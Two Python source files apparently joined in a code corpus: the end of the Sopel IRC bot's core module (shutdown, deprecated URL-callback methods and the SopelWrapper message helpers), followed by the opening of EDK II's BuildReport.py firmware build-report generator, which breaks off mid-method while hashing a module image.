"""Internal bot shutdown method."""
LOGGER.info("Shutting down")
# Stop Job Scheduler
LOGGER.info("Stopping the Job Scheduler.")
self._scheduler.stop()
try:
self._scheduler.join(timeout=15)
except RuntimeError:
LOGGER.exception("Unable to stop the Job Scheduler.")
else:
LOGGER.info("Job Scheduler stopped.")
self._scheduler.clear_jobs()
# Shutdown plugins
LOGGER.info(
"Calling shutdown for %d plugins.", len(self.shutdown_methods))
for shutdown_method in self.shutdown_methods:
try:
LOGGER.debug(
"Calling %s.%s",
shutdown_method.__module__,
shutdown_method.__name__)
shutdown_method(self)
except Exception as e:
LOGGER.exception("Error calling shutdown method: %s", e)
# Avoid calling shutdown methods if we already have.
self.shutdown_methods = []
# URL callbacks management
@deprecated(
reason='Issues with @url decorator have been fixed. Simply use that.',
version='7.1',
warning_in='8.0',
removed_in='9.0',
)
def register_url_callback(self, pattern, callback):
"""Register a ``callback`` for URLs matching the regex ``pattern``.
:param pattern: compiled regex pattern to register
:type pattern: :ref:`re.Pattern <python:re-objects>`
:param callback: callable object to handle matching URLs
:type callback: :term:`function`
.. versionadded:: 7.0
This method replaces manual management of ``url_callbacks`` in
Sopel's plugins, so instead of doing this in ``setup()``::
if 'url_callbacks' not in bot.memory:
bot.memory['url_callbacks'] = tools.SopelMemory()
regex = re.compile(r'http://example.com/path/.*')
bot.memory['url_callbacks'][regex] = callback
use this much more concise pattern::
regex = re.compile(r'http://example.com/path/.*')
bot.register_url_callback(regex, callback)
It's recommended you completely avoid manual management of URL
callbacks through the use of :func:`sopel.plugin.url`.
.. deprecated:: 7.1
Made obsolete by fixes to the behavior of
:func:`sopel.plugin.url`. Will be removed in Sopel 9.
.. versionchanged:: 8.0
Stores registered callbacks in an internal property instead of
``bot.memory['url_callbacks']``.
"""
if isinstance(pattern, str):
pattern = re.compile(pattern)
self._url_callbacks[pattern] = callback
@deprecated(
reason='Issues with @url decorator have been fixed. Simply use that.',
version='7.1',
warning_in='8.0',
removed_in='9.0',
)
def unregister_url_callback(self, pattern, callback):
"""Unregister the callback for URLs matching the regex ``pattern``.
:param pattern: compiled regex pattern to unregister callback
:type pattern: :ref:`re.Pattern <python:re-objects>`
:param callback: callable object to remove
:type callback: :term:`function`
.. versionadded:: 7.0
This method replaces manual management of ``url_callbacks`` in
Sopel's plugins, so instead of doing this in ``shutdown()``::
regex = re.compile(r'http://example.com/path/.*')
try:
del bot.memory['url_callbacks'][regex]
except KeyError:
pass
use this much more concise pattern::
regex = re.compile(r'http://example.com/path/.*')
bot.unregister_url_callback(regex, callback)
It's recommended you completely avoid manual management of URL
callbacks through the use of :func:`sopel.plugin.url`.
.. deprecated:: 7.1
Made obsolete by fixes to the behavior of
:func:`sopel.plugin.url`. Will be removed in Sopel 9.
.. versionchanged:: 8.0
Deletes registered callbacks from an internal property instead of
``bot.memory['url_callbacks']``.
"""
if isinstance(pattern, str):
pattern = re.compile(pattern)
try:
del self._url_callbacks[pattern]
except KeyError:
pass
def search_url_callbacks(self, url):
"""Yield callbacks whose regex pattern matches the ``url``.
:param str url: URL found in a trigger
:return: yield 2-value tuples of ``(callback, match)``
For each pattern that matches the ``url`` parameter, it yields a
2-value tuple of ``(callable, match)`` for that pattern.
The ``callable`` is the one registered with
:meth:`register_url_callback`, and the ``match`` is the result of
the regex pattern's ``search`` method.
.. versionadded:: 7.0
.. versionchanged:: 8.0
Searches for registered callbacks in an internal property instead
of ``bot.memory['url_callbacks']``.
.. deprecated:: 8.0
Made obsolete by fixes to the behavior of
:func:`sopel.plugin.url`. Will be removed in Sopel 9.
.. seealso::
The Python documentation for the `re.search`__ function and
the `match object`__.
.. __: https://docs.python.org/3.6/library/re.html#re.search
.. __: https://docs.python.org/3.6/library/re.html#match-objects
"""
for regex, function in self._url_callbacks.items():
match = regex.search(url)
if match:
yield function, match
def restart(self, message):
"""Disconnect from IRC and restart the bot.
:param str message: QUIT message to send (e.g. "Be right back!")
"""
self.wantsrestart = True
self.quit(message)
class SopelWrapper:
"""Wrapper around a Sopel instance and a Trigger.
:param sopel: Sopel instance
:type sopel: :class:`~sopel.bot.Sopel`
:param trigger: IRC Trigger line
:type trigger: :class:`~sopel.trigger.Trigger`
:param str output_prefix: prefix for messages sent through this wrapper
(e.g. plugin tag)
This wrapper will be used to call Sopel's triggered commands and rules as
their ``bot`` argument. It acts as a proxy to :meth:`send messages<say>`
to the sender (either a channel or in a private message) and even to
:meth:`reply to someone<reply>` in a channel.
"""
def __init__(self, sopel, trigger, output_prefix=''):
if not output_prefix:
# Just in case someone passes in False, None, etc.
output_prefix = ''
# The custom __setattr__ for this class sets the attribute on the
# original bot object. We don't want that for these, so we set them
# with the normal __setattr__.
object.__setattr__(self, '_bot', sopel)
object.__setattr__(self, '_trigger', trigger)
object.__setattr__(self, '_out_pfx', output_prefix)
def __dir__(self):
classattrs = [attr for attr in self.__class__.__dict__
if not attr.startswith('__')]
return list(self.__dict__) + classattrs + dir(self._bot)
def __getattr__(self, attr):
return getattr(self._bot, attr)
def __setattr__(self, attr, value):
return setattr(self._bot, attr, value)
def say(self, message, destination=None, max_messages=1, truncation='', trailing=''):
"""Override ``Sopel.say`` to use trigger source by default.
:param str message: message to say
:param str destination: channel or nickname; defaults to
:attr:`trigger.sender <sopel.trigger.Trigger.sender>`
:param int max_messages: split ``message`` into at most this many
messages if it is too long to fit into one
line (optional)
:param str truncation: string to indicate that the ``message`` was
truncated (optional)
:param str trailing: string that should always appear at the end of
``message`` (optional)
The ``destination`` will default to the channel in which the
trigger happened (or nickname, if received in a private message).
.. seealso::
For more details about the optional arguments to this wrapper
method, consult the documentation for :meth:`sopel.bot.Sopel.say`.
"""
if destination is None:
destination = self._trigger.sender
self._bot.say(self._out_pfx + message, destination, max_messages, truncation, trailing)
def action(self, message, destination=None):
"""Override ``Sopel.action`` to use trigger source by default.
:param str message: action message
:param str destination: channel or nickname; defaults to
:attr:`trigger.sender <sopel.trigger.Trigger.sender>`
The ``destination`` will default to the channel in which the
trigger happened (or nickname, if received in a private message).
.. seealso::
:meth:`sopel.bot.Sopel.action`
"""
if destination is None:
destination = self._trigger.sender
self._bot.action(message, destination)
def notice(self, message, destination=None):
"""Override ``Sopel.notice`` to use trigger source by default.
:param str message: notice message
:param str destination: channel or nickname; defaults to
:attr:`trigger.sender <sopel.trigger.Trigger.sender>`
The ``destination`` will default to the channel in which the
trigger happened (or nickname, if received in a private message).
.. seealso::
:meth:`sopel.bot.Sopel.notice`
"""
if destination is None:
destination = self._trigger.sender
self._bot.notice(self._out_pfx + message, destination)
def reply(self, message, destination=None, reply_to=None, notice=False):
"""Override ``Sopel.reply`` to ``reply_to`` sender by default.
:param str message: reply message
:param str destination: channel or nickname; defaults to
:attr:`trigger.sender <sopel.trigger.Trigger.sender>`
:param str reply_to: person to reply to; defaults to
:attr:`trigger.nick <sopel.trigger.Trigger.nick>`
:param bool notice: reply as an IRC notice or with a simple message
The ``destination`` will default to the channel in which the
trigger happened (or nickname, if received in a private message).
``reply_to`` will default to the nickname who sent the trigger.
.. seealso::
:meth:`sopel.bot.Sopel.reply`
"""
if destination is None:
destination = self._trigger.sender
if reply_to is None:
reply_to = self._trigger.nick
self._bot.reply(message, destination, reply_to, notice)
def kick(self, nick, channel=None, message=None):
"""Override ``Sopel.kick`` to kick in a channel
:param str nick: nick to kick out of the ``channel``
:param str channel: optional channel to kick ``nick`` from
:param str message: optional message for the kick
The ``channel`` will default to the channel in which the call was
triggered. If triggered from a private message, ``channel`` is
required.
.. seealso::
:meth:`sopel.bot.Sopel.kick`
"""
if channel is None:
if self._trigger.is_privmsg:
raise RuntimeError('Error: KICK requires a channel.')
else:
channel = self._trigger.sender
if nick is None:
raise RuntimeError('Error: KICK requires a nick.')
self._bot.kick(nick, channel, message)
|
BuildReport.py | ## @file
# Routines for generating build report.
#
# This module contains the functionality to generate build report after
# build all target completes successfully.
#
# Copyright (c) 2010 - 2018, Intel Corporation. All rights reserved.<BR>
# This program and the accompanying materials
# are licensed and made available under the terms and conditions of the BSD License
# which accompanies this distribution. The full text of the license may be found at
# http://opensource.org/licenses/bsd-license.php
#
# THE PROGRAM IS DISTRIBUTED UNDER THE BSD LICENSE ON AN "AS IS" BASIS,
# WITHOUT WARRANTIES OR REPRESENTATIONS OF ANY KIND, EITHER EXPRESS OR IMPLIED.
#
## Import Modules
#
import Common.LongFilePathOs as os
import re
import platform
import textwrap
import traceback
import sys
import time
import struct
import hashlib
import subprocess
import threading
from datetime import datetime
from io import BytesIO
from Common import EdkLogger
from Common.Misc import SaveFileOnChange
from Common.Misc import GuidStructureByteArrayToGuidString
from Common.Misc import GuidStructureStringToGuidString
from Common.BuildToolError import FILE_WRITE_FAILURE
from Common.BuildToolError import CODE_ERROR
from Common.BuildToolError import COMMAND_FAILURE
from Common.BuildToolError import FORMAT_INVALID
from Common.LongFilePathSupport import OpenLongFilePath as open
from Common.MultipleWorkspace import MultipleWorkspace as mws
import Common.GlobalData as GlobalData
from AutoGen.AutoGen import ModuleAutoGen
from Common.Misc import PathClass
from Common.StringUtils import NormPath
from Common.DataType import *
import collections
from Common.Expression import *
from GenFds.AprioriSection import DXE_APRIORI_GUID, PEI_APRIORI_GUID
## Pattern to extract contents in EDK DXS files
gDxsDependencyPattern = re.compile(r"DEPENDENCY_START(.+)DEPENDENCY_END", re.DOTALL)
## Pattern to find total FV total size, occupied size in flash report intermediate file
gFvTotalSizePattern = re.compile(r"EFI_FV_TOTAL_SIZE = (0x[0-9a-fA-F]+)")
gFvTakenSizePattern = re.compile(r"EFI_FV_TAKEN_SIZE = (0x[0-9a-fA-F]+)")
## Pattern to find module size and time stamp in module summary report intermediate file
gModuleSizePattern = re.compile(r"MODULE_SIZE = (\d+)")
gTimeStampPattern = re.compile(r"TIME_STAMP = (\d+)")
## Pattern to find GUID value in flash description files
gPcdGuidPattern = re.compile(r"PCD\((\w+)[.](\w+)\)")
## Pattern to collect offset, GUID value pair in the flash report intermediate file
gOffsetGuidPattern = re.compile(r"(0x[0-9A-Fa-f]+) ([-A-Fa-f0-9]+)")
## Pattern to find module base address and entry point in fixed flash map file
gModulePattern = r"\n[-\w]+\s*\(([^,]+),\s*BaseAddress=%(Address)s,\s*EntryPoint=%(Address)s\)\s*\(GUID=([-0-9A-Fa-f]+)[^)]*\)"
gMapFileItemPattern = re.compile(gModulePattern % {"Address" : "(-?0[xX][0-9A-Fa-f]+)"})
## Pattern to find all module referenced header files in source files
gIncludePattern = re.compile(r'#include\s*["<]([^">]+)[">]')
gIncludePattern2 = re.compile(r"#include\s+EFI_([A-Z_]+)\s*[(]\s*(\w+)\s*[)]")
## Pattern to find the entry point for EDK module using EDKII Glue library
gGlueLibEntryPoint = re.compile(r"__EDKII_GLUE_MODULE_ENTRY_POINT__\s*=\s*(\w+)")
## Tags for MaxLength of line in report
gLineMaxLength = 120
## Tags for end of line in report
gEndOfLine = "\r\n"
## Tags for section start, end and separator
gSectionStart = ">" + "=" * (gLineMaxLength - 2) + "<"
gSectionEnd = "<" + "=" * (gLineMaxLength - 2) + ">" + "\n"
gSectionSep = "=" * gLineMaxLength
## Tags for subsection start, end and separator
gSubSectionStart = ">" + "-" * (gLineMaxLength - 2) + "<"
gSubSectionEnd = "<" + "-" * (gLineMaxLength - 2) + ">"
gSubSectionSep = "-" * gLineMaxLength
## The look up table to map PCD type to pair of report display type and DEC type
gPcdTypeMap = {
TAB_PCDS_FIXED_AT_BUILD : ('FIXED', TAB_PCDS_FIXED_AT_BUILD),
TAB_PCDS_PATCHABLE_IN_MODULE: ('PATCH', TAB_PCDS_PATCHABLE_IN_MODULE),
TAB_PCDS_FEATURE_FLAG : ('FLAG', TAB_PCDS_FEATURE_FLAG),
TAB_PCDS_DYNAMIC : ('DYN', TAB_PCDS_DYNAMIC),
TAB_PCDS_DYNAMIC_HII : ('DYNHII', TAB_PCDS_DYNAMIC),
TAB_PCDS_DYNAMIC_VPD : ('DYNVPD', TAB_PCDS_DYNAMIC),
TAB_PCDS_DYNAMIC_EX : ('DEX', TAB_PCDS_DYNAMIC_EX),
TAB_PCDS_DYNAMIC_EX_HII : ('DEXHII', TAB_PCDS_DYNAMIC_EX),
TAB_PCDS_DYNAMIC_EX_VPD : ('DEXVPD', TAB_PCDS_DYNAMIC_EX),
}
## The look up table to map module type to driver type
gDriverTypeMap = {
SUP_MODULE_SEC : '0x3 (SECURITY_CORE)',
SUP_MODULE_PEI_CORE : '0x4 (PEI_CORE)',
SUP_MODULE_PEIM : '0x6 (PEIM)',
SUP_MODULE_DXE_CORE : '0x5 (DXE_CORE)',
SUP_MODULE_DXE_DRIVER : '0x7 (DRIVER)',
SUP_MODULE_DXE_SAL_DRIVER : '0x7 (DRIVER)',
SUP_MODULE_DXE_SMM_DRIVER : '0x7 (DRIVER)',
SUP_MODULE_DXE_RUNTIME_DRIVER: '0x7 (DRIVER)',
SUP_MODULE_UEFI_DRIVER : '0x7 (DRIVER)',
SUP_MODULE_UEFI_APPLICATION : '0x9 (APPLICATION)',
SUP_MODULE_SMM_CORE : '0xD (SMM_CORE)',
'SMM_DRIVER' : '0xA (SMM)', # Extension of module type to support PI 1.1 SMM drivers
SUP_MODULE_MM_STANDALONE : '0xE (MM_STANDALONE)',
SUP_MODULE_MM_CORE_STANDALONE : '0xF (MM_CORE_STANDALONE)'
}
## The look up table of the supported opcode in the dependency expression binaries
gOpCodeList = ["BEFORE", "AFTER", "PUSH", "AND", "OR", "NOT", "TRUE", "FALSE", "END", "SOR"]
## Save VPD Pcd
VPDPcdList = []
##
# Writes a string to the file object.
#
# This function writes a string to the file object and a new line is appended
# afterwards. It may optionally wraps the string for better readability.
#
# @File The file object to write
# @String The string to be written to the file
# @Wrapper Indicates whether to wrap the string
#
def FileWrite(File, String, Wrapper=False):
if Wrapper:
String = textwrap.fill(String, 120)
File.write(String + gEndOfLine)
def ByteArrayForamt(Value):
IsByteArray = False
SplitNum = 16
ArrayList = []
if Value.startswith('{') and Value.endswith('}'):
Value = Value[1:-1]
ValueList = Value.split(',')
if len(ValueList) >= SplitNum:
IsByteArray = True
if IsByteArray:
if ValueList:
Len = len(ValueList)/SplitNum
for i, element in enumerate(ValueList):
ValueList[i] = '0x%02X' % int(element.strip(), 16)
if Len:
Id = 0
while (Id <= Len):
End = min(SplitNum*(Id+1), len(ValueList))
Str = ','.join(ValueList[SplitNum*Id : End])
if End == len(ValueList):
Str += '}'
ArrayList.append(Str)
break
else:
Str += ','
ArrayList.append(Str)
Id += 1
else:
ArrayList = [Value + '}']
return IsByteArray, ArrayList
##
# Find all the header file that the module source directly includes.
#
# This function scans source code to find all header files the module may
# include. This is not accurate but very effective to find all the header
# file the module might include with #include statement.
#
# @Source The source file name
# @IncludePathList The list of include path to find the source file.
# @IncludeFiles The dictionary of current found include files.
#
def FindIncludeFiles(Source, IncludePathList, IncludeFiles):
FileContents = open(Source).read()
#
# Find header files with pattern #include "XXX.h" or #include <XXX.h>
#
for Match in gIncludePattern.finditer(FileContents):
FileName = Match.group(1).strip()
for Dir in [os.path.dirname(Source)] + IncludePathList:
FullFileName = os.path.normpath(os.path.join(Dir, FileName))
if os.path.exists(FullFileName):
IncludeFiles[FullFileName.lower().replace("\\", "/")] = FullFileName
break
#
# Find header files with pattern like #include EFI_PPI_CONSUMER(XXX)
#
for Match in gIncludePattern2.finditer(FileContents):
Key = Match.group(2)
Type = Match.group(1)
if "ARCH_PROTOCOL" in Type:
FileName = "ArchProtocol/%(Key)s/%(Key)s.h" % {"Key" : Key}
elif "PROTOCOL" in Type:
FileName = "Protocol/%(Key)s/%(Key)s.h" % {"Key" : Key}
elif "PPI" in Type:
FileName = "Ppi/%(Key)s/%(Key)s.h" % {"Key" : Key}
elif TAB_GUID in Type:
FileName = "Guid/%(Key)s/%(Key)s.h" % {"Key" : Key}
else:
continue
for Dir in IncludePathList:
FullFileName = os.path.normpath(os.path.join(Dir, FileName))
if os.path.exists(FullFileName):
IncludeFiles[FullFileName.lower().replace("\\", "/")] = FullFileName
break
## Split each lines in file
#
# This method is used to split the lines in file to make the length of each line
# less than MaxLength.
#
# @param Content The content of file
# @param MaxLength The Max Length of the line
#
def FileLinesSplit(Content=None, MaxLength=None):
ContentList = Content.split(TAB_LINE_BREAK)
NewContent = ''
NewContentList = []
for Line in ContentList:
while len(Line.rstrip()) > MaxLength:
LineSpaceIndex = Line.rfind(TAB_SPACE_SPLIT, 0, MaxLength)
LineSlashIndex = Line.rfind(TAB_SLASH, 0, MaxLength)
LineBackSlashIndex = Line.rfind(TAB_BACK_SLASH, 0, MaxLength)
if max(LineSpaceIndex, LineSlashIndex, LineBackSlashIndex) > 0:
LineBreakIndex = max(LineSpaceIndex, LineSlashIndex, LineBackSlashIndex)
else:
LineBreakIndex = MaxLength
NewContentList.append(Line[:LineBreakIndex])
Line = Line[LineBreakIndex:]
if Line:
NewContentList.append(Line)
for NewLine in NewContentList:
NewContent += NewLine + TAB_LINE_BREAK
NewContent = NewContent.replace(TAB_LINE_BREAK, gEndOfLine).replace('\r\r\n', gEndOfLine)
return NewContent
##
# Parse binary dependency expression section
#
# This utility class parses the dependency expression section and translate the readable
# GUID name and value.
#
class DepexParser(object):
##
# Constructor function for class DepexParser
#
# This constructor function collect GUID values so that the readable
# GUID name can be translated.
#
# @param self The object pointer
# @param Wa Workspace context information
#
def __init__(self, Wa):
self._GuidDb = {}
for Pa in Wa.AutoGenObjectList:
for Package in Pa.PackageList:
for Protocol in Package.Protocols:
GuidValue = GuidStructureStringToGuidString(Package.Protocols[Protocol])
self._GuidDb[GuidValue.upper()] = Protocol
for Ppi in Package.Ppis:
GuidValue = GuidStructureStringToGuidString(Package.Ppis[Ppi])
self._GuidDb[GuidValue.upper()] = Ppi
for Guid in Package.Guids:
GuidValue = GuidStructureStringToGuidString(Package.Guids[Guid])
self._GuidDb[GuidValue.upper()] = Guid
for Ma in Pa.ModuleAutoGenList:
for Pcd in Ma.FixedVoidTypePcds:
PcdValue = Ma.FixedVoidTypePcds[Pcd]
if len(PcdValue.split(',')) == 16:
GuidValue = GuidStructureByteArrayToGuidString(PcdValue)
self._GuidDb[GuidValue.upper()] = Pcd
##
# Parse the binary dependency expression files.
#
# This function parses the binary dependency expression file and translate it
# to the instruction list.
#
# @param self The object pointer
# @param DepexFileName The file name of binary dependency expression file.
#
def ParseDepexFile(self, DepexFileName):
DepexFile = open(DepexFileName, "rb")
DepexStatement = []
OpCode = DepexFile.read(1)
while OpCode:
Statement = gOpCodeList[struct.unpack("B", OpCode)[0]]
if Statement in ["BEFORE", "AFTER", "PUSH"]:
GuidValue = "%08X-%04X-%04X-%02X%02X-%02X%02X%02X%02X%02X%02X" % \
struct.unpack(PACK_PATTERN_GUID, DepexFile.read(16))
GuidString = self._GuidDb.get(GuidValue, GuidValue)
Statement = "%s %s" % (Statement, GuidString)
DepexStatement.append(Statement)
OpCode = DepexFile.read(1)
return DepexStatement
##
# Reports library information
#
# This class reports the module library subsection in the build report file.
#
class LibraryReport(object):
##
# Constructor function for class LibraryReport
#
# This constructor function generates LibraryReport object for
# a module.
#
# @param self The object pointer
# @param M Module context information
#
def __init__(self, M):
self.LibraryList = []
if int(str(M.AutoGenVersion), 0) >= 0x00010005:
self._EdkIIModule = True
else:
self._EdkIIModule = False
for Lib in M.DependentLibraryList:
LibInfPath = str(Lib)
LibClassList = Lib.LibraryClass[0].LibraryClass
LibConstructorList = Lib.ConstructorList
LibDesstructorList = Lib.DestructorList
LibDepexList = Lib.DepexExpression[M.Arch, M.ModuleType]
for LibAutoGen in M.LibraryAutoGenList:
if LibInfPath == LibAutoGen.MetaFile.Path:
LibTime = LibAutoGen.BuildTime
break
self.LibraryList.append((LibInfPath, LibClassList, LibConstructorList, LibDesstructorList, LibDepexList, LibTime))
##
# Generate report for module library information
#
# This function generates report for the module library.
# If the module is EDKII style one, the additional library class, library
# constructor/destructor and dependency expression may also be reported.
#
# @param self The object pointer
# @param File The file object for report
#
def GenerateReport(self, File):
if len(self.LibraryList) > 0:
FileWrite(File, gSubSectionStart)
FileWrite(File, TAB_BRG_LIBRARY)
FileWrite(File, gSubSectionSep)
for LibraryItem in self.LibraryList:
LibInfPath = LibraryItem[0]
FileWrite(File, LibInfPath)
#
# Report library class, library constructor and destructor for
# EDKII style module.
#
if self._EdkIIModule:
LibClass = LibraryItem[1]
EdkIILibInfo = ""
LibConstructor = " ".join(LibraryItem[2])
if LibConstructor:
EdkIILibInfo += " C = " + LibConstructor
LibDestructor = " ".join(LibraryItem[3])
if LibDestructor:
EdkIILibInfo += " D = " + LibDestructor
LibDepex = " ".join(LibraryItem[4])
if LibDepex:
EdkIILibInfo += " Depex = " + LibDepex
if LibraryItem[5]:
EdkIILibInfo += " Time = " + LibraryItem[5]
if EdkIILibInfo:
FileWrite(File, "{%s: %s}" % (LibClass, EdkIILibInfo))
else:
FileWrite(File, "{%s}" % LibClass)
FileWrite(File, gSubSectionEnd)
##
# Reports dependency expression information
#
# This class reports the module dependency expression subsection in the build report file.
#
class DepexReport(object):
##
# Constructor function for class DepexReport
#
# This constructor function generates DepexReport object for
# a module. If the module source contains the DXS file (usually EDK
# style module), it uses the dependency in DXS file; otherwise,
# it uses the dependency expression from its own INF [Depex] section
# and then merges with the ones from its dependent library INF.
#
# @param self The object pointer
# @param M Module context information
#
def __init__(self, M):
self.Depex = ""
self._DepexFileName = os.path.join(M.BuildDir, "OUTPUT", M.Module.BaseName + ".depex")
ModuleType = M.ModuleType
if not ModuleType:
ModuleType = COMPONENT_TO_MODULE_MAP_DICT.get(M.ComponentType, "")
if ModuleType in [SUP_MODULE_SEC, SUP_MODULE_PEI_CORE, SUP_MODULE_DXE_CORE, SUP_MODULE_SMM_CORE, SUP_MODULE_MM_CORE_STANDALONE, SUP_MODULE_UEFI_APPLICATION]:
return
for Source in M.SourceFileList:
if os.path.splitext(Source.Path)[1].lower() == ".dxs":
Match = gDxsDependencyPattern.search(open(Source.Path).read())
if Match:
self.Depex = Match.group(1).strip()
self.Source = "DXS"
break
else:
self.Depex = M.DepexExpressionDict.get(M.ModuleType, "")
self.ModuleDepex = " ".join(M.Module.DepexExpression[M.Arch, M.ModuleType])
if not self.ModuleDepex:
self.ModuleDepex = "(None)"
LibDepexList = []
for Lib in M.DependentLibraryList:
LibDepex = " ".join(Lib.DepexExpression[M.Arch, M.ModuleType]).strip()
if LibDepex != "":
LibDepexList.append("(" + LibDepex + ")")
self.LibraryDepex = " AND ".join(LibDepexList)
if not self.LibraryDepex:
self.LibraryDepex = "(None)"
self.Source = "INF"
##
# Generate report for module dependency expression information
#
# This function generates report for the module dependency expression.
#
# @param self The object pointer
# @param File The file object for report
# @param GlobalDepexParser The platform global Dependency expression parser object
#
def GenerateReport(self, File, GlobalDepexParser):
if not self.Depex:
return
FileWrite(File, gSubSectionStart)
if os.path.isfile(self._DepexFileName):
try:
DepexStatements = GlobalDepexParser.ParseDepexFile(self._DepexFileName)
FileWrite(File, "Final Dependency Expression (DEPEX) Instructions")
for DepexStatement in DepexStatements:
FileWrite(File, " %s" % DepexStatement)
FileWrite(File, gSubSectionSep)
except:
EdkLogger.warn(None, "Dependency expression file is corrupted", self._DepexFileName)
FileWrite(File, "Dependency Expression (DEPEX) from %s" % self.Source)
if self.Source == "INF":
FileWrite(File, self.Depex, True)
FileWrite(File, gSubSectionSep)
FileWrite(File, "From Module INF: %s" % self.ModuleDepex, True)
FileWrite(File, "From Library INF: %s" % self.LibraryDepex, True)
else:
FileWrite(File, self.Depex)
FileWrite(File, gSubSectionEnd)
##
# Reports dependency expression information
#
# This class reports the module build flags subsection in the build report file.
#
class BuildFlagsReport(object):
##
# Constructor function for class BuildFlagsReport
#
# This constructor function generates BuildFlagsReport object for
# a module. It reports the build tool chain tag and all relevant
# build flags to build the module.
#
# @param self The object pointer
# @param M Module context information
#
def __init__(self, M):
BuildOptions = {}
#
# Add build flags according to source file extension so that
# irrelevant ones can be filtered out.
#
for Source in M.SourceFileList:
Ext = os.path.splitext(Source.File)[1].lower()
if Ext in [".c", ".cc", ".cpp"]:
BuildOptions["CC"] = 1
elif Ext in [".s", ".asm"]:
BuildOptions["PP"] = 1
BuildOptions["ASM"] = 1
elif Ext in [".vfr"]:
BuildOptions["VFRPP"] = 1
BuildOptions["VFR"] = 1
elif Ext in [".dxs"]:
BuildOptions["APP"] = 1
BuildOptions["CC"] = 1
elif Ext in [".asl"]:
BuildOptions["ASLPP"] = 1
BuildOptions["ASL"] = 1
elif Ext in [".aslc"]:
BuildOptions["ASLCC"] = 1
BuildOptions["ASLDLINK"] = 1
BuildOptions["CC"] = 1
elif Ext in [".asm16"]:
BuildOptions["ASMLINK"] = 1
BuildOptions["SLINK"] = 1
BuildOptions["DLINK"] = 1
#
# Save module build flags.
#
self.ToolChainTag = M.ToolChain
self.BuildFlags = {}
for Tool in BuildOptions:
self.BuildFlags[Tool + "_FLAGS"] = M.BuildOption.get(Tool, {}).get("FLAGS", "")
##
# Generate report for module build flags information
#
# This function generates report for the module build flags expression.
#
# @param self The object pointer
# @param File The file object for report
#
def GenerateReport(self, File):
FileWrite(File, gSubSectionStart)
FileWrite(File, "Build Flags")
FileWrite(File, "Tool Chain Tag: %s" % self.ToolChainTag)
for Tool in self.BuildFlags:
FileWrite(File, gSubSectionSep)
FileWrite(File, "%s = %s" % (Tool, self.BuildFlags[Tool]), True)
FileWrite(File, gSubSectionEnd)
##
# Reports individual module information
#
# This class reports the module section in the build report file.
# It comprises of module summary, module PCD, library, dependency expression,
# build flags sections.
#
class ModuleReport(object):
##
# Constructor function for class ModuleReport
#
# This constructor function generates ModuleReport object for
# a separate module in a platform build.
#
# @param self The object pointer
# @param M Module context information
# @param ReportType The kind of report items in the final report file
#
def __init__(self, M, ReportType):
self.ModuleName = M.Module.BaseName
self.ModuleInfPath = M.MetaFile.File
self.FileGuid = M.Guid
self.Size = 0
self.BuildTimeStamp = None
self.Hash = 0
self.DriverType = ""
if not M.IsLibrary:
ModuleType = M.ModuleType
if not ModuleType:
ModuleType = COMPONENT_TO_MODULE_MAP_DICT.get(M.ComponentType, "")
#
# If a module complies to PI 1.1, promote Module type to "SMM_DRIVER"
#
if ModuleType == SUP_MODULE_DXE_SMM_DRIVER:
PiSpec = M.Module.Specification.get("PI_SPECIFICATION_VERSION", "0x00010000")
if int(PiSpec, 0) >= 0x0001000A:
ModuleType = "SMM_DRIVER"
self.DriverType = gDriverTypeMap.get(ModuleType, "0x2 (FREE_FORM)")
self.UefiSpecVersion = M.Module.Specification.get("UEFI_SPECIFICATION_VERSION", "")
self.PiSpecVersion = M.Module.Specification.get("PI_SPECIFICATION_VERSION", "")
self.PciDeviceId = M.Module.Defines.get("PCI_DEVICE_ID", "")
self.PciVendorId = M.Module.Defines.get("PCI_VENDOR_ID", "")
self.PciClassCode = M.Module.Defines.get("PCI_CLASS_CODE", "")
self.BuildTime = M.BuildTime
self._BuildDir = M.BuildDir
self.ModulePcdSet = {}
if "PCD" in ReportType:
#
# Collect all module used PCD set: module INF referenced directly or indirectly.
# It also saves module INF default values of them in case they exist.
#
for Pcd in M.ModulePcdList + M.LibraryPcdList:
self.ModulePcdSet.setdefault((Pcd.TokenCName, Pcd.TokenSpaceGuidCName, Pcd.Type), (Pcd.InfDefaultValue, Pcd.DefaultValue))
self.LibraryReport = None
if "LIBRARY" in ReportType:
self.LibraryReport = LibraryReport(M)
self.DepexReport = None
if "DEPEX" in ReportType:
self.DepexReport = DepexReport(M)
if "BUILD_FLAGS" in ReportType:
self.BuildFlagsReport = BuildFlagsReport(M)
##
# Generate report for module information
#
# This function generates report for separate module expression
# in a platform build.
#
# @param self The object pointer
# @param File The file object for report
# @param GlobalPcdReport The platform global PCD report object
# @param GlobalPredictionReport The platform global Prediction report object
# @param GlobalDepexParser The platform global Dependency expression parser object
# @param ReportType The kind of report items in the final report file
#
def GenerateReport(self, File, GlobalPcdReport, GlobalPredictionReport, GlobalDepexParser, ReportType):
FileWrite(File, gSectionStart)
FwReportFileName = os.path.join(self._BuildDir, "DEBUG", self.ModuleName + ".txt")
if os.path.isfile(FwReportFileName):
try:
FileContents = open(FwReportFileName).read()
Match = gModuleSizePattern.search(FileContents)
if Match:
self.Size = int(Match.group(1))
Match = gTimeStampPattern.search(FileContents)
if Match:
self.BuildTimeStamp = datetime.fromtimestamp(int(Match.group(1)))
except IOError:
EdkLogger.warn(None, "Fail to read report file", FwReportFileName)
if "HASH" in ReportType:
OutputDir = os.path.join(self._BuildDir, "OUTPUT")
DefaultEFIfile = os.path.join(OutputDir, self.ModuleName + ".efi")
if os.path.isfile(DefaultEFIfile):
Tempfile = os.path.join(OutputDir, self.ModuleName + "_hash.tmp")
# rebase the efi image since its base address may not zero
cmd = ["GenFw", "--rebase", str(0), "-o", Tempfile, DefaultEFIfile]
try:
PopenObject = subprocess.Popen(' '.join(cmd), stdout=subprocess.PIPE, stderr=subprocess.PIPE, shell=True)
except Exception as X:
EdkLogger.error("GenFw", COMMAND_FAILURE, ExtraData="%s: %s" % (str(X), cmd[0]))
EndOfProcedure = threading.Event()
EndOfProcedure.clear()
if PopenObject.stderr:
StdErrThread = threading.Thread(target=ReadMessage, args=(PopenObject.stderr, EdkLogger.quiet, EndOfProcedure))
StdErrThread.setName("STDERR-Redirector")
StdErrThread.setDaemon(False)
StdErrThread.start()
# waiting for program exit
PopenObject.wait()
if PopenObject.stderr:
StdErrThread.join()
if PopenObject.returncode != 0:
EdkLogger.error("GenFw", COMMAND_FAILURE, "Failed to generate firmware hash image for %s" % (DefaultEFIfile))
if os.path.isfile(Tempfile):
self.Hash = hashlib.sha1()
buf = open(Tempfile, 'rb').read()
if self.Hash.update(buf):
self.Hash = self.Hash.update(buf)
